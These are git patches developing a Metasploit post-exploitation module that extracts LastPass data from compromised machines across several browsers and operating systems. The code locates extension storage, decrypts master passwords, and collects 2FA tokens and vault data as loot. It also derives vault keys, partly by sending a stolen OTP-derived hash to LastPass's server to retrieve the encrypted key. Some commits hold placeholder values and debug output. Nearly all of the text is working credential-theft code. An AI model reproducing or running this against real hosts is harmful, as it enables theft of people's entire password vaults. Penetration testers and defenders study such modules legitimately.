Stable\\Local Storage\\chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0.localstorage", - 'Safari' => "#{user_profile['LocalAppData']}\\Apple Computer\\Safari\\LocalStorage\\safari-extension_com.lastpass.lpsafariextension-n24rep3bmn_0.localstorage" - } - when /unix|linux/ - browser_path_map = { - 'Chrome' => "#{user_profile['LocalAppData']}/.config/google-chrome/Default/Local Storage/chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0.localstorage", - 'Firefox' => "#{user_profile['LocalAppData']}/.lastpass", - 'Opera' => "#{user_profile['LocalAppData']}/.config/Opera/Local Storage/chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0.localstorage" - } - when /osx/ - browser_path_map = { - 'Chrome' => "#{user_profile['LocalAppData']}/Google/Chrome/Default/Local Storage/chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0.localstorage", - 'Firefox' => "#{user_profile['LocalAppData']}/LastPass", - 'Opera' => "#{user_profile['LocalAppData']}/com.operasoftware.Opera/Local Storage/chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0.localstorage", - 'Safari' => "#{user_profile['AppData']}/Safari/LocalStorage/safari-extension_com.lastpass.lpsafariextension-n24rep3bmn_0.localstorage" - } - else - print_error "Platform not recognized: #{platform}" - end - - found_localstorage_map[account] = {} - browser_path_map.each_pair do |browser, path| - found_localstorage_map[account][browser] = path if client.fs.file.exists?(path) - end - end - - found_localstorage_map end #Extracts the 2FA token from localStorage - def check_localstorage_for_2FA_token(localstorage_map, lastpass_data) - localstorage_map.each_pair do |account, browser_map| - browser_map.each_pair do |browser, path| + def extract_2fa_tokens(account_map) + account_map.each_pair do |account, browser_map| + browser_map.each_pair do |browser, lp_data| if browser == 'Firefox' - lastpass_data[account][browser].each_pair do |username, data| - path = path + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_ff.sotp" + lastpass_data[account][browser].each_pair do |username, user_data| + path = path + client.fs.file.separator + "lp.suid" data = read_file(path) if client.fs.file.exists?(path) #Read file if it exists data = "DECRYPTION_ERROR" if (data.blank? || data.size != 32) # Verify content loot_path = store_loot( @@ -389,17 +363,18 @@ class Metasploit3 < Msf::Post "Firefox 2FA token file #{path}" ) lastpass_data[account][browser][username] << data + end else # Chrome, Safari and Opera - data = read_file(path) + data = read_file(lp_data['localstorage_db']) loot_path = store_loot( "#{browser.downcase}.lastpass.localstorage", 'application/x-sqlite3', session, data, nil, - "#{account}'s #{browser} LastPass localstorage #{path}" + "#{account}'s #{browser} LastPass localstorage #{lp_data['localstorage_db']}" ) # Parsing/Querying the DB @@ -409,37 +384,33 @@ class Metasploit3 < Msf::Post "WHERE key = 'lp.uid';" ).flatten - lastpass_data[account][browser].each_pair do |username, data| - token.blank? ? lastpass_data[account][browser][username] << "NOT_FOUND" : lastpass_data[account][browser][username] << token.pack('H*') - end + token.blank? ? account_map[account][browser]['lp_2fa'] = "NOT_FOUND" : account_map[account][browser]['lp_2fa'] = token.pack('H*') end end end - - lastpass_data end #Print all extracted LastPass data - def print_lastpass_data(lastpass_data) + def print_lastpass_data(account_map) lastpass_data_table = Rex::Ui::Text::Table.new( 'Header' => "LastPass data", 'Indent' => 1, - 'Columns' => %w(Account Browser LastPass_Username LastPass_Password, LastPass_2FA) + 'Columns' => %w(Account Browser LP_Username LP_Password LP_2FA LP_Key) ) - lastpass_data.each_pair do |account, browser_map| - browser_map.each_pair do |browser, username_map| - username_map.each_pair do |user, data| - lastpass_data_table << [account, browser, user] + data + account_map.each_pair do |account, browser_map| + browser_map.each_pair do |browser, lp_data| + lp_data['lp_creds'].each_pair do |username, user_data| + lastpass_data_table << [account, browser, username, user_data['lp_password'], lp_data['lp_2fa'], user_data['vault_key']] end end end - unless lastpass_data.empty? + unless account_map.empty? print_good lastpass_data_table.to_s path = store_loot( - "lastpass.creds", + "lastpass.data", "text/csv", session, lastpass_data_table.to_csv, @@ -447,7 +418,173 @@ class Metasploit3 < Msf::Post "LastPass Data" ) end + end + + + def extract_vault_and_iterations(account_map) + account_map.each_pair do |account, browser_map| + browser_map.each_pair do |browser, lp_data| + lp_data['lp_creds'].each_pair do |username, user_data| + if browser == 'Firefox' + path = firefox_map[account][browser] + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_key.itr" + data = read_file(path) if client.fs.file.exists?(path) #Read file if it exists + data = "NOT FOUND" if data.blank? # Verify content + lastpass_data[account][browser][username] << data + + else # Chrome, Safari and Opera + db = SQLite3::Database.new(lp_data['lp_db_loot']) + result = db.execute( + "SELECT data FROM LastPassData " \ + "WHERE username_hash = '"+OpenSSL::Digest::SHA256.hexdigest(username)+"' AND type = 'accts'" + ) + + if result.size == 1 && !result[0].blank? + if /iterations=(?.*);(?.*)/ =~ result[0][0] + lp_data['lp_creds'][username]['iterations'] = iterations + loot_path = store_loot( + "#{browser.downcase}.lastpass.vault", + 'text/plain', + session, + vault, + nil, + "#{account}'s #{browser} LastPass Vault #{lp_data['lp_db_loot']}" + ) + lp_data['lp_creds'][username]['vault_loot'] = loot_path + else + lp_data['lp_creds'][username]['iterations'] = 1 + loot_path = store_loot( + "#{browser.downcase}.lastpass.vault", + 'text/plain', + session, + result[0][0], + nil, + "#{account}'s #{browser} LastPass Vault #{lp_data['lp_db_loot']}" + ) + lp_data['lp_creds'][username]['vault_loot'] = loot_path + end + else + lp_data['lp_creds'][username]['iterations'] = "NOT_FOUND" + lp_data['lp_creds'][username]['vault_loot'] = "NOT_FOUND" + end + end + end + end + end + end + + + + + def extract_keys(account_map) + account_map.each_pair do |account, browser_map| + browser_map.each_pair do |browser, lp_data| + lp_data['lp_creds'].each_pair do |username, user_data| + otp, encrypted_key = extract_otp_and_encrypted_key(account, browser, username, lp_data['lp_db_loot']) + #otp_token = OpenSSL::Digest::SHA256.hexdigest( OpenSSL::Digest::SHA256.hexdigest( username + otp ) + otp ) + otp = "7b88275911a8efc3efe50a3bda6ac202" + otpbin = [otp].pack "H*" + otp_token = lastpass_sha256( lastpass_sha256( username + otpbin ) + otpbin ) + lp_data['lp_creds'][username]['vault_key'] = decrypt_vault_key(username, otp_token, encrypted_key) + + + end + end + end + end + + + # Returns otp, encrypted_key + def extract_otp_and_encrypted_key(account, browser, username, path) + if browser == 'Firefox' + path = firefox_map[account][browser] + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_ff.sotp" + otp = read_file(path) if client.fs.file.exists?(path) #Read file if it exists + otp = "NOT FOUND" if otp.blank? # Verify content + + path = firefox_map[account][browser] + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_lpall.slps" + encrypted_key = read_file(path) if client.fs.file.exists?(path) #Read file if it exists + encrypted_key = "NOT FOUND" if encrypted_key.blank? # Verify content + data = encrypted_key.split("\r")[0] + return [otp, encrypted_key] + else # Chrome, Safari and Opera + db = SQLite3::Database.new(path) + result = db.execute( + "SELECT type, data FROM LastPassData " \ + "WHERE username_hash = '"+OpenSSL::Digest::SHA256.hexdigest(username)+"' AND type IN ('otp', 'key')" + ) + + if result.size == 2 + if result[0][0] == "otp" + return result[0][1], result[1][1] + else + return result[1][1], result[0][1] + end + end + + return "", "" + end + end + + + def decrypt_vault_key(username, token, encrypted_key) + return "adecryptionkey" end + + # LastPass does some preprocessing (UTF8) when doing a SHA256 on special chars (binary) + def lastpass_sha256(input) + output = "" + + input.split("").each do |char| + digit = char.ord + if (digit <= 128) + output += digit.chr + else + output += (digit >> 6 | 192).chr + output += (digit >> 6 & 63 | 128).chr + output += (digit & 63 | 128).chr + end + end + + #Nasty hack to switch Windows /r/n for /n + output = output.delete 130.chr+131.chr + output << 130.chr + + return OpenSSL::Digest::SHA256.hexdigest(output) + end + + + def lastpass_sha256_test(input) + input = "7b88275911a8efc3efe50a3bda6ac202" + input = [input].pack "H*" + output = "" + #inputbin = [input].pack "H*" + puts input + input.split("").each do |char| + digit = char.ord + if (digit <= 128) + output += digit.chr + else + output += (digit >> 6 | 192).chr + output += (digit >> 6 & 63 | 128).chr + output += (digit & 63 | 128).chr + end + + end + + input.split("").each do |char| + puts char.ord + end + puts OpenSSL::Digest::SHA256.hexdigest(output) + #return + + #Nasty hack to switch Windows /r/n for /n + #output = output.delete 130.chr+131.chr + #output << 130.chr + + return OpenSSL::Digest::SHA256.hexdigest(output) + end + + + end From da9420a9159dd831f119aff98afcc6121c592db5 Mon Sep 17 00:00:00 2001 From: Martin Vigo Date: Mon, 26 Oct 2015 19:17:09 -0700 Subject: [PATCH 005/686] Retrieve randkey from LastPass --- modules/post/multi/gather/lastpass_creds.rb | 184 +++++++++----------- 1 file changed, 87 insertions(+), 97 deletions(-) diff --git a/modules/post/multi/gather/lastpass_creds.rb b/modules/post/multi/gather/lastpass_creds.rb index f0d74e40b0..41b1b6812a 100644 --- a/modules/post/multi/gather/lastpass_creds.rb +++ b/modules/post/multi/gather/lastpass_creds.rb @@ -29,6 +29,7 @@ class Metasploit3 < Msf::Post end def run + if session.platform =~ /win/ && session.type == "shell" # No Windows shell support print_error "Shell sessions on Windows are not supported" return @@ -49,7 +50,7 @@ class Metasploit3 < Msf::Post extract_2fa_tokens(account_map) print_status "Extracting encryption keys" - extract_keys(account_map) + extract_vault_keys(account_map) print_status "Extracting vault and iterations" extract_vault_and_iterations(account_map) @@ -253,35 +254,29 @@ class Metasploit3 < Msf::Post credentials end - # Decrypts the password - def clear_text_password(email, encrypted_data) + + def decrypt_data(key, encrypted_data) return if encrypted_data.blank? - decrypted_password = "DECRYPTION_ERROR" - - sha256_hex_email = OpenSSL::Digest::SHA256.hexdigest(email) - sha256_binary_email = [sha256_hex_email].pack "H*" # Do hex2bin + decrypted_data = "DECRYPTION_ERROR" if encrypted_data.include?("|") # Use CBC decipher = OpenSSL::Cipher.new("AES-256-CBC") - decipher.decrypt - decipher.key = sha256_binary_email # The key is the emails hashed to SHA256 and converted to binary decipher.iv = Base64.decode64(encrypted_data[1, 24]) # Discard ! and | - encrypted_password = encrypted_data[26..-1] + encrypted_data = encrypted_data[26..-1] #Take only the data part else # Use ECB decipher = OpenSSL::Cipher.new("AES-256-ECB") - decipher.decrypt - decipher.key = sha256_binary_email - encrypted_password = encrypted_data end begin - decrypted_password = decipher.update(Base64.decode64(encrypted_password)) + decipher.final + decipher.decrypt + decipher.key = key + decrypted_data = decipher.update(Base64.decode64(encrypted_data)) + decipher.final rescue - vprint_error "Password for #{email} could not be decrypted" + vprint_error "Data could not be decrypted" end - decrypted_password + decrypted_data end def extract_credentials(account_map) @@ -304,11 +299,15 @@ class Metasploit3 < Msf::Post ffcreds = firefox_credentials(loot_path) unless ffcreds.blank? ffcreds.each do |creds| - creds[1].blank? ? creds[1] = "NOT_FOUND" : creds[1] = clear_text_password(URI.unescape(creds[0]), URI.unescape(creds[1])) #Decrypt credentials - credentials[account][browser][URI.unescape(creds[0])] = [URI.unescape(creds[1])] + if creds[1].blank? + creds[1] = "NOT_FOUND" + else + sha256_hex_email = OpenSSL::Digest::SHA256.hexdigest(URI.unescape(creds[0])) + sha256_binary_email = [sha256_hex_email].pack "H*" # Do hex2bin + creds[1] = decrypt_data(sha256_binary_email, URI.unescape(creds[1])) + account_map[account][browser]['lp_creds'][creds[0]] = {'lp_password' => creds[1]} + end end - else - credentials[account].delete("Firefox") end end @@ -334,8 +333,14 @@ class Metasploit3 < Msf::Post for row in result if row[0] - row[1].blank? ? row[1] = "NOT_FOUND" : row[1] = clear_text_password(row[0], row[1]) #Decrypt credentials - account_map[account][browser]['lp_creds'][row[0]] = {'lp_password' => row[1]} + if row[1].blank? + row[1] = "NOT_FOUND" + else + sha256_hex_email = OpenSSL::Digest::SHA256.hexdigest(row[0]) + sha256_binary_email = [sha256_hex_email].pack "H*" # Do hex2bin + row[1] = decrypt_data(sha256_binary_email, row[1]) + account_map[account][browser]['lp_creds'][row[0]] = {'lp_password' => row[1]} + end end end end @@ -473,118 +478,103 @@ class Metasploit3 < Msf::Post end - - - def extract_keys(account_map) + def extract_vault_keys(account_map) account_map.each_pair do |account, browser_map| browser_map.each_pair do |browser, lp_data| lp_data['lp_creds'].each_pair do |username, user_data| - otp, encrypted_key = extract_otp_and_encrypted_key(account, browser, username, lp_data['lp_db_loot']) - #otp_token = OpenSSL::Digest::SHA256.hexdigest( OpenSSL::Digest::SHA256.hexdigest( username + otp ) + otp ) - otp = "7b88275911a8efc3efe50a3bda6ac202" - otpbin = [otp].pack "H*" - otp_token = lastpass_sha256( lastpass_sha256( username + otpbin ) + otpbin ) - lp_data['lp_creds'][username]['vault_key'] = decrypt_vault_key(username, otp_token, encrypted_key) - - + otp = extract_otp(account, browser, username, lp_data['lp_db_loot']) + lp_data['lp_creds'][username]['vault_key'] = decrypt_vault_key_with_otp(username, otp) end end end end - # Returns otp, encrypted_key - def extract_otp_and_encrypted_key(account, browser, username, path) + def extract_otp(account, browser, username, path) if browser == 'Firefox' path = firefox_map[account][browser] + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_ff.sotp" otp = read_file(path) if client.fs.file.exists?(path) #Read file if it exists otp = "NOT FOUND" if otp.blank? # Verify content - - path = firefox_map[account][browser] + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_lpall.slps" - encrypted_key = read_file(path) if client.fs.file.exists?(path) #Read file if it exists - encrypted_key = "NOT FOUND" if encrypted_key.blank? # Verify content - data = encrypted_key.split("\r")[0] - return [otp, encrypted_key] + return otp else # Chrome, Safari and Opera db = SQLite3::Database.new(path) result = db.execute( "SELECT type, data FROM LastPassData " \ - "WHERE username_hash = '"+OpenSSL::Digest::SHA256.hexdigest(username)+"' AND type IN ('otp', 'key')" + "WHERE username_hash = '"+OpenSSL::Digest::SHA256.hexdigest(username)+"' AND type = 'otp'" ) - - if result.size == 2 - if result[0][0] == "otp" - return result[0][1], result[1][1] - else - return result[1][1], result[0][1] - end - end - - return "", "" + return result[0][1] end end - def decrypt_vault_key(username, token, encrypted_key) - return "adecryptionkey" - + def make_vault_key_from_creds username, password, key_iteration_count + if key_iteration_count == 1 + key = Digest::SHA256.hexdigest username + password + else + key = pbkdf2(password, username, key_iteration_count, 32) + end + + return key end + def decrypt_vault_key_with_otp username, otp + otpbin = [otp].pack "H*" + vault_key_decryption_key = [lastpass_sha256(username + otpbin)].pack "H*" + encrypted_vault_key = retrieve_encrypted_vault_key_with_otp(username, otp) + return decrypt_data(vault_key_decryption_key, encrypted_vault_key) + end + + def retrieve_encrypted_vault_key_with_otp username, otp + # Derive login hash from otp + otpbin = [otp].pack "H*" + otp_token = lastpass_sha256( lastpass_sha256( username + otpbin ) + otpbin ) # OTP login hash + + # Make request to LastPass + uri = URI('https://lastpass.com/otp.php') + request = Net::HTTP::Post.new(uri) + request.set_form_data("login" => 1, "xml" => 1, "hash" => otp_token, "otpemail" => URI.escape(username), "outofbandsupported" => 1, "changepw" => otp_token) + request.content_type = 'application/x-www-form-urlencoded; charset=UTF-8' + response = Net::HTTP.start(uri.hostname, uri.port, :use_ssl => true) {|http| + http.request(request) + } + + # Parse response + encrypted_vault_key = nil + if response.body.match(/randkey\="(.*)"/) + encrypted_vault_key = response.body.match(/randkey\="(.*)"/)[1] + end + + return encrypted_vault_key + end # LastPass does some preprocessing (UTF8) when doing a SHA256 on special chars (binary) def lastpass_sha256(input) output = "" - input.split("").each do |char| - digit = char.ord - if (digit <= 128) - output += digit.chr + input = input.gsub("\r\n", "\n") + + input.each_byte do |e| + if 128 > e + output += e.chr else - output += (digit >> 6 | 192).chr - output += (digit >> 6 & 63 | 128).chr - output += (digit & 63 | 128).chr + if (127 < e && 2048 > e) + output += (e >> 6 | 192).chr + output += (e & 63 | 128).chr + else + output += (e >> 12 | 224).chr + output += (e >> 6 & 63 | 128).chr + end end end - #Nasty hack to switch Windows /r/n for /n - output = output.delete 130.chr+131.chr - output << 130.chr - return OpenSSL::Digest::SHA256.hexdigest(output) end - def lastpass_sha256_test(input) - input = "7b88275911a8efc3efe50a3bda6ac202" - input = [input].pack "H*" - output = "" - #inputbin = [input].pack "H*" - puts input - input.split("").each do |char| - digit = char.ord - if (digit <= 128) - output += digit.chr - else - output += (digit >> 6 | 192).chr - output += (digit >> 6 & 63 | 128).chr - output += (digit & 63 | 128).chr - end - - end - - input.split("").each do |char| - puts char.ord - end - puts OpenSSL::Digest::SHA256.hexdigest(output) - #return - - #Nasty hack to switch Windows /r/n for /n - #output = output.delete 130.chr+131.chr - #output << 130.chr - - return OpenSSL::Digest::SHA256.hexdigest(output) - end - + def pbkdf2(password, salt, iterations, key_length) + digest = OpenSSL::Digest::SHA256.new + return OpenSSL::PKCS5.pbkdf2_hmac(password, salt, iterations, key_length, digest).unpack 'H*' + end end From e67065a7e91b4ac694f76cf6a34bebb3dd7e04fb Mon Sep 17 00:00:00 2001 From: Martin Vigo Date: Mon, 26 Oct 2015 22:40:47 -0700 Subject: [PATCH 006/686] Fix Firefox/Opera bugs --- modules/post/multi/gather/lastpass_creds.rb | 131 +++++++++++--------- 1 file changed, 74 insertions(+), 57 deletions(-) diff --git a/modules/post/multi/gather/lastpass_creds.rb b/modules/post/multi/gather/lastpass_creds.rb index 41b1b6812a..2601e09767 100644 --- a/modules/post/multi/gather/lastpass_creds.rb +++ b/modules/post/multi/gather/lastpass_creds.rb @@ -14,7 +14,7 @@ class Metasploit3 < Msf::Post update_info( info, 'Name' => 'LastPass Master Password Extractor', - 'Description' => 'This module extracts and decrypts LastPass master login accounts and passwords', + 'Description' => 'This module extracts and decrypts LastPass master login accounts and passwords, encryption keys, 2FA tokens and all the vault passwords', 'License' => MSF_LICENSE, 'Author' => [ 'Alberto Garcia Illera ', # original module and research @@ -49,12 +49,12 @@ class Metasploit3 < Msf::Post print_status "Extracting 2FA tokens" extract_2fa_tokens(account_map) - print_status "Extracting encryption keys" - extract_vault_keys(account_map) - print_status "Extracting vault and iterations" extract_vault_and_iterations(account_map) + print_status "Extracting encryption keys" + extract_vault_keys(account_map) + print_lastpass_data(account_map) end @@ -80,7 +80,7 @@ class Metasploit3 < Msf::Post } localstorage_path_map = { 'Chrome' => "#{user_profile['LocalAppData']}\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0.localstorage", - 'Firefox' => "#{user_profile['LocalAppData']}\\LastPass", + 'Firefox' => "#{user_profile['LocalAppData']}Low\\LastPass", 'Opera' => "#{user_profile['AppData']}\\Opera Software\\Opera Stable\\Local Storage\\chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0.localstorage", 'Safari' => "#{user_profile['LocalAppData']}\\Apple Computer\\Safari\\LocalStorage\\safari-extension_com.lastpass.lpsafariextension-n24rep3bmn_0.localstorage" } @@ -238,7 +238,7 @@ class Metasploit3 < Msf::Post creds_per_user = encoded_creds.split("|") creds_per_user.each do |user_creds| parts = user_creds.split('=') - for creds in credentials # Check if we have the username already + for creds in credentials # Check iuf we have the username already if creds[0] == parts[0] creds[1] = parts[1] # Add the password to the existing username else @@ -256,9 +256,7 @@ class Metasploit3 < Msf::Post def decrypt_data(key, encrypted_data) - return if encrypted_data.blank? - - decrypted_data = "DECRYPTION_ERROR" + return nil if encrypted_data.blank? if encrypted_data.include?("|") # Use CBC decipher = OpenSSL::Cipher.new("AES-256-CBC") @@ -300,12 +298,12 @@ class Metasploit3 < Msf::Post unless ffcreds.blank? ffcreds.each do |creds| if creds[1].blank? - creds[1] = "NOT_FOUND" + creds[1] = nil # No master password found else sha256_hex_email = OpenSSL::Digest::SHA256.hexdigest(URI.unescape(creds[0])) sha256_binary_email = [sha256_hex_email].pack "H*" # Do hex2bin creds[1] = decrypt_data(sha256_binary_email, URI.unescape(creds[1])) - account_map[account][browser]['lp_creds'][creds[0]] = {'lp_password' => creds[1]} + account_map[account][browser]['lp_creds'][URI.unescape(creds[0])] = {'lp_password' => creds[1]} end end end @@ -333,14 +331,10 @@ class Metasploit3 < Msf::Post for row in result if row[0] - if row[1].blank? - row[1] = "NOT_FOUND" - else - sha256_hex_email = OpenSSL::Digest::SHA256.hexdigest(row[0]) - sha256_binary_email = [sha256_hex_email].pack "H*" # Do hex2bin - row[1] = decrypt_data(sha256_binary_email, row[1]) - account_map[account][browser]['lp_creds'][row[0]] = {'lp_password' => row[1]} - end + sha256_hex_email = OpenSSL::Digest::SHA256.hexdigest(row[0]) + sha256_binary_email = [sha256_hex_email].pack "H*" # Do hex2bin + row[1].blank? ? row[1] = nil : row[1] = decrypt_data(sha256_binary_email, row[1]) # Decrypt master password + account_map[account][browser]['lp_creds'][row[0]] = {'lp_password' => row[1]} end end end @@ -355,22 +349,18 @@ class Metasploit3 < Msf::Post account_map.each_pair do |account, browser_map| browser_map.each_pair do |browser, lp_data| if browser == 'Firefox' - lastpass_data[account][browser].each_pair do |username, user_data| - path = path + client.fs.file.separator + "lp.suid" - data = read_file(path) if client.fs.file.exists?(path) #Read file if it exists - data = "DECRYPTION_ERROR" if (data.blank? || data.size != 32) # Verify content - loot_path = store_loot( - 'firefox.preferences', - 'text/binary', - session, - data, - nil, - "Firefox 2FA token file #{path}" - ) - lastpass_data[account][browser][username] << data - - end - + path = lp_data['localstorage_db'] + client.fs.file.separator + "lp.suid" + data = read_file(path) if client.fs.file.exists?(path) #Read file if it exists + data = nil if (data.blank? || data.size != 32) # Verify content + loot_path = store_loot( + 'firefox.preferences', + 'text/binary', + session, + data, + nil, + "Firefox 2FA token file #{path}" + ) + account_map[account][browser]['lp_2fa'] = data else # Chrome, Safari and Opera data = read_file(lp_data['localstorage_db']) loot_path = store_loot( @@ -389,7 +379,7 @@ class Metasploit3 < Msf::Post "WHERE key = 'lp.uid';" ).flatten - token.blank? ? account_map[account][browser]['lp_2fa'] = "NOT_FOUND" : account_map[account][browser]['lp_2fa'] = token.pack('H*') + token.blank? ? account_map[account][browser]['lp_2fa'] = nil : account_map[account][browser]['lp_2fa'] = token.pack('H*') end end end @@ -431,10 +421,30 @@ class Metasploit3 < Msf::Post browser_map.each_pair do |browser, lp_data| lp_data['lp_creds'].each_pair do |username, user_data| if browser == 'Firefox' - path = firefox_map[account][browser] + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_key.itr" - data = read_file(path) if client.fs.file.exists?(path) #Read file if it exists - data = "NOT FOUND" if data.blank? # Verify content - lastpass_data[account][browser][username] << data + path = lp_data['localstorage_db'] + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_key.itr" + iterations = read_file(path) if client.fs.file.exists?(path) #Read file if it exists + iterations = "NOT FOUND" if iterations.blank? # Verify content + lp_data['lp_creds'][username]['iterations'] = iterations + loot_path = store_loot( + "#{browser.downcase}.lastpass.iterations", + 'text/plain', + session, + iterations, + nil, + "#{account}'s #{browser} LastPass iterations" + ) + path = lp_data['localstorage_db'] + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_lps.act.sxml" + vault = read_file(path) if client.fs.file.exists?(path) #Read file if it exists + vault = "NOT FOUND" if vault.blank? # Verify content + lp_data['lp_creds'][username]['vault_loot'] = "NOT_FOUND" + loot_path = store_loot( + "#{browser.downcase}.lastpass.vault", + 'text/plain', + session, + vault, + nil, + "#{account}'s #{browser} LastPass Vault" + ) else # Chrome, Safari and Opera db = SQLite3::Database.new(lp_data['lp_db_loot']) @@ -447,12 +457,12 @@ class Metasploit3 < Msf::Post if /iterations=(?.*);(?.*)/ =~ result[0][0] lp_data['lp_creds'][username]['iterations'] = iterations loot_path = store_loot( - "#{browser.downcase}.lastpass.vault", + "#{browser.downcase}.lastpass.iterations", 'text/plain', session, vault, nil, - "#{account}'s #{browser} LastPass Vault #{lp_data['lp_db_loot']}" + "#{account}'s #{browser} LastPass iterations" ) lp_data['lp_creds'][username]['vault_loot'] = loot_path else @@ -463,7 +473,7 @@ class Metasploit3 < Msf::Post session, result[0][0], nil, - "#{account}'s #{browser} LastPass Vault #{lp_data['lp_db_loot']}" + "#{account}'s #{browser} LastPass Vault" ) lp_data['lp_creds'][username]['vault_loot'] = loot_path end @@ -477,51 +487,54 @@ class Metasploit3 < Msf::Post end end - def extract_vault_keys(account_map) account_map.each_pair do |account, browser_map| browser_map.each_pair do |browser, lp_data| lp_data['lp_creds'].each_pair do |username, user_data| - otp = extract_otp(account, browser, username, lp_data['lp_db_loot']) - lp_data['lp_creds'][username]['vault_key'] = decrypt_vault_key_with_otp(username, otp) + if !user_data['lp_password'].blank? && user_data['iterations'] != "NOT_FOUND"# Derive vault key from credentials + lp_data['lp_creds'][username]['vault_key'] = derive_vault_key_from_creds(username, lp_data['lp_creds'][username]['lp_password'], user_data['iterations']) + else # Get vault key from disabled OTP + otp = extract_otp(account, browser, username, lp_data) + lp_data['lp_creds'][username]['vault_key'] = decrypt_vault_key_with_otp(username, otp) + end end end end end # Returns otp, encrypted_key - def extract_otp(account, browser, username, path) + def extract_otp(account, browser, username, lp_data) if browser == 'Firefox' - path = firefox_map[account][browser] + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_ff.sotp" + path = lp_data['localstorage_db'] + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_ff.sotp" otp = read_file(path) if client.fs.file.exists?(path) #Read file if it exists otp = "NOT FOUND" if otp.blank? # Verify content return otp else # Chrome, Safari and Opera - db = SQLite3::Database.new(path) + db = SQLite3::Database.new(lp_data['lp_db_loot']) result = db.execute( "SELECT type, data FROM LastPassData " \ "WHERE username_hash = '"+OpenSSL::Digest::SHA256.hexdigest(username)+"' AND type = 'otp'" ) - return result[0][1] + result[0][1] end end - def make_vault_key_from_creds username, password, key_iteration_count + def derive_vault_key_from_creds username, password, key_iteration_count if key_iteration_count == 1 key = Digest::SHA256.hexdigest username + password else - key = pbkdf2(password, username, key_iteration_count, 32) + key = pbkdf2(password, username, key_iteration_count.to_i, 32) end - return key + key.first end def decrypt_vault_key_with_otp username, otp otpbin = [otp].pack "H*" vault_key_decryption_key = [lastpass_sha256(username + otpbin)].pack "H*" encrypted_vault_key = retrieve_encrypted_vault_key_with_otp(username, otp) - return decrypt_data(vault_key_decryption_key, encrypted_vault_key) + decrypt_data(vault_key_decryption_key, encrypted_vault_key) end def retrieve_encrypted_vault_key_with_otp username, otp @@ -538,13 +551,17 @@ class Metasploit3 < Msf::Post http.request(request) } + puts request.body + puts response.body + + # Parse response encrypted_vault_key = nil if response.body.match(/randkey\="(.*)"/) encrypted_vault_key = response.body.match(/randkey\="(.*)"/)[1] end - return encrypted_vault_key + encrypted_vault_key end # LastPass does some preprocessing (UTF8) when doing a SHA256 on special chars (binary) @@ -567,13 +584,13 @@ class Metasploit3 < Msf::Post end end - return OpenSSL::Digest::SHA256.hexdigest(output) + OpenSSL::Digest::SHA256.hexdigest(output) end def pbkdf2(password, salt, iterations, key_length) digest = OpenSSL::Digest::SHA256.new - return OpenSSL::PKCS5.pbkdf2_hmac(password, salt, iterations, key_length, digest).unpack 'H*' + OpenSSL::PKCS5.pbkdf2_hmac(password, salt, iterations, key_length, digest).unpack 'H*' end From b0f92b49a2e371ac6bf3a0c52034c85514b3b7a7 Mon Sep 17 00:00:00 2001 From: Martin Vigo Date: Sun, 1 Nov 2015 21:47:00 -0800 Subject: [PATCH 007/686] Print vault passwords --- modules/post/multi/gather/lastpass_creds.rb | 187 ++++++++++++++++---- 1 file changed, 148 insertions(+), 39 deletions(-) diff --git a/modules/post/multi/gather/lastpass_creds.rb b/modules/post/multi/gather/lastpass_creds.rb index 2601e09767..bcb4fa7c8b 100644 --- a/modules/post/multi/gather/lastpass_creds.rb +++ b/modules/post/multi/gather/lastpass_creds.rb @@ -29,7 +29,6 @@ class Metasploit3 < Msf::Post end def run - if session.platform =~ /win/ && session.type == "shell" # No Windows shell support print_error "Shell sessions on Windows are not supported" return @@ -118,7 +117,11 @@ class Metasploit3 < Msf::Post db_paths = find_db_paths(path, browser, account) if db_paths && db_paths.size > 0 account_map[account][browser]['lp_db_path'] = db_paths - account_map[account][browser]['localstorage_db'] = localstorage_path_map[browser] if client.fs.file.exists?(localstorage_path_map[browser]) || browser == 'Firefox' + if session.type == "meterpreter" + account_map[account][browser]['localstorage_db'] = localstorage_path_map[browser] if client.fs.file.exists?(localstorage_path_map[browser]) || browser == 'Firefox' + else # session.type == "shell" + account_map[account][browser]['localstorage_db'] = localstorage_path_map[browser] if session.shell_command("ls \"#{localstorage_path_map[browser]}\"").strip == localstorage_path_map[browser].strip || browser == 'Firefox' + end else account_map[account].delete(browser) end @@ -232,13 +235,13 @@ class Metasploit3 < Msf::Post if /user_pref\("extensions.lastpass.loginusers", "(?.*)"\);/ =~ line usernames = encoded_users.split("|") usernames.each do |username| - credentials << [username, "NOT_FOUND"] + credentials << [username, nil] end elsif /user_pref\("extensions.lastpass.loginpws", "(?.*)"\);/ =~ line creds_per_user = encoded_creds.split("|") creds_per_user.each do |user_creds| parts = user_creds.split('=') - for creds in credentials # Check iuf we have the username already + for creds in credentials # Check if we have the username already if creds[0] == parts[0] creds[1] = parts[1] # Add the password to the existing username else @@ -297,8 +300,8 @@ class Metasploit3 < Msf::Post ffcreds = firefox_credentials(loot_path) unless ffcreds.blank? ffcreds.each do |creds| - if creds[1].blank? - creds[1] = nil # No master password found + if creds[1].blank? # No master password found + account_map[account][browser]['lp_creds'][URI.unescape(creds[0])] = {'lp_password' => nil} else sha256_hex_email = OpenSSL::Digest::SHA256.hexdigest(URI.unescape(creds[0])) sha256_binary_email = [sha256_hex_email].pack "H*" # Do hex2bin @@ -351,7 +354,7 @@ class Metasploit3 < Msf::Post if browser == 'Firefox' path = lp_data['localstorage_db'] + client.fs.file.separator + "lp.suid" data = read_file(path) if client.fs.file.exists?(path) #Read file if it exists - data = nil if 